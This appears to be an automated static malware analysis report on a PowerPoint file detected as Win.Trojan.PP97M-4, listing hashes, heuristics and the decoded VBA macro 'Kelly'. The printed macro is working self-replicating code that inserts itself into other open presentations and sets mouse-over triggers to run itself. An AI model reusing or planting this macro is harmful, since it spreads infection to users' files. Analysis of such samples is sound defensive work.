Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f6697b432fbdccf7…

MALICIOUS

Office (OLE)

12.5 KB Created: 1999-01-25 10:08:15 Authoring application: Microsoft PowerPoint First seen: 2012-06-14
MD5: 421e777dda55652f51fae95122506310 SHA-1: 046d2bfa890944c885ac66cf41a98d38a13bb52a SHA-256: f6697b432fbdccf7af2f4eeb9cb11e727c6d0763ddf86e2f4acb03b03d7e6dbc
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

This PowerPoint file contains VBA macros detected by ClamAV as Win.Trojan.PP97M-4. The macro code, named 'Kelly', is designed to copy itself to other open presentations and execute. This behavior suggests a downloader or dropper functionality, aiming to spread and potentially execute further malicious code, though no specific payload or network indicators were extracted.

Heuristics 2

  • ClamAV: Win.Trojan.PP97M-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.PP97M-4
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 656 bytes
SHA-256: 059c1ec401199eb56ca5062920646695c5ce2e6d58b37b1b51ebebbf67744ad2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Kelly"
'Copyright (C) 1998 by FlyShadow ~^^~ - Kelly
Sub ι(Kelly)
On Error Resume Next
Set α = ActivePresentation.VBProject.VBComponents("Kelly").CodeModule
ν = α.CountOfLines + 1: λ = α.Lines(1, ν)
For Each ν In Presentations
If ν.VBProject.VBComponents(α).Name <> α Then
ν.VBProject.VBComponents.Add(1).Name = α
ν.VBProject.VBComponents(α).CodeModule.InsertLines 1, λ
For Each η In ν.Slides(ν.Slides.Count).Shapes
If η.ActionSettings(ppMouseOver).Action = 0 Then _
η.ActionSettings(ppMouseOver).Action = ppActionRunMacro: _
η.ActionSettings(ppMouseOver).Run = "ι"
Next: End If: Next
End Sub